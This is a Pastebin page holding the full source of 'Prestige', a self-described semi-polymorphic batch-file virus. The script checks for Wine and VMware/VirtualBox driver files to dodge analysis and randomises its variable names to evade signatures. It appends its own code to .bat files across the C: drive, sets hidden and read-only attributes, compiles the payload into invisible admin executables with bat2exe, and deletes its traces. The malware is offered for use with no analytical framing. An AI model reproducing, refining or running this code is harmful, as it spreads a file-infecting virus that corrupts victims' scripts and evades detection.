API tools faq
paste
FlyFar

Prestige - A Semi-Polymorphic Batch Virus - Source Code

FlyFar
Jul 12th, 2023
116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 4.10 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ::This is a polymorphic engine wrote completely in Batch
  2. ::@blmvxer
  3. ::
  4. ::We Need Anti-Wine(Utilize-Wine), Anti-Vbox, and Anti-Emulator::
  5. @echo off
  6. ::Check for WINE
  7. IF EXIST "Z:\" (GOTO WINE) ELSE (GOTO NOWINE)
  8. :WINE
  9. echo "Wine Exist time to go!!!"
  10. goto AVWVBEM
  11. :NOWINE
  12. echo "Wine Not Found Continue"
  13. ::Anti-VirtualMachine
  14. IF EXIST "C:\windows\system32\drivers\vmci.sys" (GOTO AVWVBEM)
  15. IF EXIST "C:\windows\system32\drivers\vmhgfs.sys" (GOTO AVWVBEM)
  16. IF EXIST "C:\windows\system32\drivers\vmmouse.sys" (GOTO AVWVBEM)
  17. IF EXIST "C:\windows\system32\drivers\vmscsi.sys" (GOTO AVWVBEM)
  18. IF EXIST "C:\windows\system32\drivers\vmusbmouse.sys" (GOTO AVWVBEM)
  19. IF EXIST "C:\windows\system32\drivers\vmx_svga.sys" (GOTO AVWVBEM)
  20. IF EXIST "C:\windows\system32\drivers\vmxnet.sys" (GOTO AVWVBEM)
  21. IF EXIST "C:\windows\system32\drivers\VBoxMouse.sys" (GOTO AVWVBEM) ELSE (GOTO Lets_Begin)
  22. :Lets_Begin
  23. ::Set counter to 0 so we can run a new encryption for different strings
  24. set counter=0
  25. ::Polymorphic Engine
  26. :loop
  27. setlocal EnableDelayedExpansion
  28. ::Set Longest Length to be 20
  29. set _RNDLength=20
  30. ::Our Character Pool
  31. set _Alphanumeric=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
  32. set _Str=%_Alphanumeric%987654321
  33. :_Lenloop
  34. if not "%_Str:~18%"=="" set _Str=%_Str:~9%& set /A _Len+=9& goto :_Lenloop
  35. set _tmp=%_Str:~9,1%
  36. set /A _Len=_Len+_tmp
  37. set _count=0
  38. set _RndAlphaNum=
  39. :_loop
  40. ::The Magic!
  41. set /A _count+=1
  42. set _RND=%random%
  43. set /A _RND=_RND%%%_Len%
  44. set _RndAlphaNum=!_RndAlphaNum!!_Alphanumeric:~%_RND%,1!
  45. if !_count! lss %_RNDLength% goto _loop
  46. ::String Encryption
  47. ::We run through the whole Engine for each String to allow a completely random charater length
  48. ::and Generated String.
  49. set /A counter=%counter%+1
  50. if %counter% EQU 1 set AAA=!_RndAlphaNum!
  51. if %counter% EQU 2 set BBB=!_RndAlphaNum!
  52. if %counter% EQU 3 set CCC=!_RndAlphaNum!
  53. if %counter% EQU 4 set DDD=!_RndAlphaNum!
  54. if %counter% EQU 5 set FFF=!_RndAlphaNum!
  55. if %counter% EQU 6 set GGG=!_RndAlphaNum!
  56. if %counter% EQU 7 set LLL=!_RndAlphaNum!
  57. if %counter% EQU 8 set MMM=!_RndAlphaNum!
  58. if %counter% EQU 9 set JJJ=!_RndAlphaNum!
  59. if %counter% EQU 10 set KKK=!_RndAlphaNum!
  60. if %counter% EQU 10 (goto ENCR) else (goto loop)
  61. :ENCR
  62. ::Virus Protection
  63. copy /Y poly.exe C:\!FFF!.exe
  64. del /F poly.exe
  65. goto VIRUS
  66. ::Here is where we pass our encryption over to the virus,
  67. :VIRUS
  68. set "us=%%0"
  69. set "lvar=@echo off"
  70. (
  71. echo !lvar!
  72. ) > !DDD!.bat
  73. ::Attributes
  74. set "attrib1=attrib +r +h !us!"
  75. (
  76. echo !attrib1!
  77. ) >> !DDD!.bat
  78. ::Standard SET Encryption with PolyStrings
  79. echo set !AAA!=for >> !DDD!.bat
  80. echo set !BBB!=do >> !DDD!.bat
  81. echo set !CCC!=type >> !DDD!.bat
  82. set "var=%%%%a"
  83. set "var2=%%%%F"
  84. set "var6=%%%%"
  85. set "var7=in"
  86. echo SET SrcCount=0 >> !DDD!.bat
  87. echo SET SrcMax=%%RANDOM%% >> !DDD!.bat
  88. set "findvictim=%%!AAA!%% /R !var2! IN (C:\*.bat) DO IF !SrcCount! LSS %%SrcMax%% ("
  89. (
  90. echo !findvictim!
  91. ) >> !DDD!.bat
  92. set "var3=SET %/A% SrcCount += 1"
  93. set "var4=Set victim=!var6!!var2!"
  94. set "var5=)"
  95. (
  96. echo !var3!
  97. echo !var4!
  98. echo !var5!
  99. ) >> !DDD!.bat
  100. ::Push the completed virus code to new host
  101. set "virus=%%!AAA!%% /R !var! !var7! (%%victim%%) %%!BBB!%% %%!CCC!%% !us! >> !var!"
  102. (
  103. echo !virus!
  104. ) >> !DDD!.bat
  105. ::Attributes 2
  106. set "attrib2=attrib -r -h !us!"
  107. (
  108. echo !attrib2!
  109. ) >> !DDD!.bat
  110. goto :CheckOS
  111. ::
  112. :CheckOS
  113. IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
  114. :64BIT
  115. start b2exe64.exe -bat !DDD!.bat -save !DDD!.exe -invisible -admin -overwrite
  116. GOTO DONE
  117. :32BIT
  118. start b2exe32.exe -bat !DDD!.bat -save !DDD!.exe -invisible -admin -overwrite
  119. GOTO DONE
  120. :DONE
  121. del !DDD!.bat
  122. mkdir C:\fij4Jdo9mdn00sqW
  123. move !DDD!.exe C:\fij4Jdo9mdn00sqW
  124. move poly.bat C:\fij4Jdo9mdn00sqW
  125. :CheckOS2
  126. IF EXIST "%PROGRAMFILES(X86)%" (GOTO 641BIT) ELSE (GOTO 321BIT)
  127. :641BIT
  128. start b2exe64.exe -bat C:\fij4Jdo9mdn00sqW\poly.bat -save C:\fij4Jdo9mdn00sqW\!MMM!.exe -invisible -admin -overwrite
  129. GOTO END
  130. :321BIT
  131. start b2exe32.exe -bat C:\fij4Jdo9mdn00sqW\poly.bat -save C:\fij4Jdo9mdn00sqW\!MMM!.exe -invisible -admin -overwrite
  132. ::END
  133. del /f %curdir%\b2exe32.exe
  134. del /f %curdir%\b2exe64.exe
  135. del %curdir%\poly.exe
  136. :AVWVBEM
  137. exit
Tags: batch file virus polymorphic bat2exe
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!